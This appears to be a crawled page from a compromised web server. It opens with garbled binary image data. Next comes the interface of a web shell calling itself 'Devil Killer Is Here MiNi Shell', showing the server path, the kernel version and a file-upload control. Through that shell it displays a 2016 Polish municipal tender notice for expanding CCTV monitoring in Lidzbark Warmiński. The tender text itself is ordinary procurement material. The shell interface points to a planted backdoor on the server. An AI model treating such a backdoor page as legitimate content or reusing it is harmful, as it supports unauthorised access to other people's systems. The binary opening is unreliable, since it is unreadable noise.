JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160701/115359-N-2016.html

<p class="kh_header"><b>Lidzbark Warmiński: Rozbudowa monitoringu miasta Lidzbark Warmiński (etap II)                      w ramach zadania inwestycyjnego pn.: Rozbudowa monitoringu miejskiego</b><br>
<b>Numer ogłoszenia: 115359 - 2016; data zamieszczenia: 01.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa monitoringu miasta Lidzbark Warmiński (etap II)                      w ramach zadania inwestycyjnego pn.: Rozbudowa monitoringu miejskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja przedsięwzięcia: Rozbudowa monitoringu miasta 
    Lidzbark Warmiński (etap II) w ramach zadania inwestycyjnego pn.: Rozbudowa 
    monitoringu miejskiego.       
2. Przedmiot zamówienia obejmuje m.in.: 
    1) rozbudowę sieci światłowodowej i zasilającej na potrzeby nowych punktów kamerowych, 
    2) rozbudowę istniejącego Centrum Monitoringu zlokalizowanego w Urzędzie Miejskim                     
        w Lidzbarku Warmińskim,
    3) modernizację systemu zobrazowania w Rezerwowym Centrum Nadzoru (w Komendzie 
        Powiatowej Policji),
    4) konfigurację i uruchomienie dostarczonego systemu,
    5) integrację istniejącego systemu wizyjnego z rozbudowywanym wyposażeniem Centrum 
        Monitoringu,    
    6) budowę nowych, następujących punktów kamerowych: 
	- K13 - parking nad rzeką (ul. Kopernika), 
	- K14 - ul. Mławska, park, 
	- K16 - schody przy kładce do Lidzbarskiego Domu Kultury.
3. Przedmiot zamówienia należy wykonać zgodnie z dokumentacją projektową,                               
    ze specyfikacją techniczną wykonania i odbioru robót budowlanych, z obowiązującymi 
    normami, przepisami, z aktualną, posiadaną najnowszą wiedzą techniczną oraz z zasadami 
    doświadczenia zawodowego.
4.	Określone w SIWZ nazwy urządzeń lub produktów, podane znaki towarowe lub pochodzenie, mają na celu określenie wymaganych parametrów technicznych lub standardów jakościowych urządzeń lub produktów, a Zamawiający, zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych, dopuszcza stosowanie urządzeń lub produktów równoważnych o parametrach technicznych i wymogach jakościowych nie niższych niż podane w SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne w stosunku do opisanych w SIWZ, obowiązany jest wykazać, że oferowane urządzenia lub produkty spełniają wymagania określone przez Zamawiającego. Na wykonawcy ciąży obowiązek udowodnienia w każdym czasie, iż proponowane urządzenia lub produkty są równoważne. W przypadku składania oferty,                                w których wykonawca proponuje urządzenia lub produkty równoważne, do oferty należy dołączyć w formie tabeli wykaz proponowanych urządzeń lub produktów równoważnych, wraz z dokumentami stwierdzającymi w sposób jednoznaczny ich równoważność. Brak wskazania w ofercie propozycji zastosowania urządzeń lub produktów równoważnych oznaczać będzie, że przedmiot zamówienia zostanie wykonany przy zastosowaniu urządzeń lub produktów przyjętych w SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.31.10.00-0, 45.23.11.00-8, 45.31.40.00-1, 45.23.23.20-1, 35.12.53.00-2, 30.21.33.00-8, 45.31.43.20-0, 32.42.40.00-1, 48.78.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium w wysokości:    
    3 000,00 PLN (słownie: trzy tysiące złotych), na cały okres związania ofertą, który wynosi 30 
    dni. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2016 r., poz. 359).
4. Miejsce i sposób wniesienia wadium.
a)	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu  Miejskiego w Lidzbarku Warmińskim w Banku Millennium S.A. Nr  13116022020000000061931481, z dopiskiem: Monitoring.
Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. rachunku  przed terminem składania ofert. Kopię potwierdzenia wniesienia wadium poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię dokumentu 
     poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce lub kopercie, oryginał tego 
     dokumentu. Nie bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
	odmówił podpisania umowy na warunkach określonych w ofercie, lub
	nie wniósł zabezpieczenia należytego wykonania umowy, lub
	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie  z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą.
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji Istotnych 
    Warunków Zamówienia, zostanie wykluczony z postępowania zgodnie z art. 24 ust. 2 pkt 
    2 ustawy - Prawo zamówień publicznych. 
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
    została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
- 	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10.Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
     wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz 
     wniesieniu zabezpieczenia należytego wykonania umowy.
11.Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę 
    przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww.  
      warunku udziału w postępowaniu.
      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży 
      oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 
      1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
      że:
      a) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
          prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie roboty 
          budowlane polegające na budowie lub przebudowie lub rozbudowie monitoringu 
          wizyjnego, każda o wartości nie mniejszej niż 150 000,00 zł brutto (słownie: sto 
          pięćdziesiąt tysięcy złotych),
     b) ww. roboty zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki 
         budowlanej i prawidłowo ukończone.

      Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą  wykazać, 
      że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww.  
      warunku udziału w postępowaniu.
      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży 
      oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 
      1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
    że dysponuje następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia:
    a) co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami          
        w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych, 
        wydane na podstawie aktualnych przepisów ustawy Prawo budowlane lub odpowiadające 
        im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej 
        obowiązujących przepisów oraz doświadczenie w sprawowaniu funkcji kierownika budowy 
        lub kierownika robót w realizacji co najmniej dwóch robót budowlanych polegających na 
        budowie lub przebudowie lub rozbudowie monitoringu wizyjnego, każda o wartości nie 
        mniejszej niż 150 000,00 zł brutto (słownie: sto pięćdziesiąt tysięcy złotych brutto),
b)  co najmniej 1 osobą posiadającą uprawnienia budowlane do kierowania robotami 
     budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
     elektrycznych i elektroenergetycznych, wydane na podstawie aktualnych przepisów ustawy
     Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały 
     wydane na podstawie wcześniej obowiązujących przepisów oraz doświadczenie                          
     w sprawowaniu funkcji kierownika budowy lub kierownika robót w realizacji co najmniej
     dwóch robót budowlanych.

Osoby, o których mowa wyżej i które uzyskały kwalifikacje do wykonywania samodzielnych funkcji technicznych w Rzeczypospolitej Polskiej, muszą być wpisane na listę członków właściwej izby samorządu zawodowego i ubezpieczone od odpowiedzialności cywilnej, co daje prawo wykonywania samodzielnych funkcji technicznych w budownictwie, zgodnie                   z ustawą z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (t.j. Dz.U. z 2014 r., poz. 1946, z późn. zm.). Oprócz osób, o których mowa wyżej w wykonaniu zamówienia mogą wziąć udział również osoby, będące obywatelami innych niż Rzeczpospolita Polska państw członkowskich Unii Europejskiej, państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, zwanych dalej państwami członkowskimi, spełniający wymagania zawarte w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2016 r., poz. 290), a w szczególności w art. 12a oraz                       w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych                          w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65).

     Wymienione w ust. 1 pkt. 1.3 osoby nie wyczerpują wymagań dla rzetelnego wypełnienia
     zobowiązań Wykonawcy i powinny być traktowane jako minimalne wymagania
     Zamawiającego. 
Wykonawca uwzględni w ofercie każdą konieczność uzupełnienia zespołu specjalistów
wynikającą z przepisów prawa, decyzji, uzgodnień i porozumień, które są niezbędne do
kompleksowej realizacji zamówienia. Kompletne wynagrodzenie całego personelu oraz wszelkie koszty związane z obsługą muszą być zawarte w cenie oferty Wykonawcy.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, 
      że:
1) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
    związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż                 
    300 000,00 PLN (słownie: trzysta tysięcy złotych),
	2) posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 
    100 000,00 PLN (słownie: sto tysięcy złotych).

    Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, 
    że łącznie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany Formularz Oferty, sporządzony według wzoru stanowiącego 
    załącznik nr 1 do SIWZ.
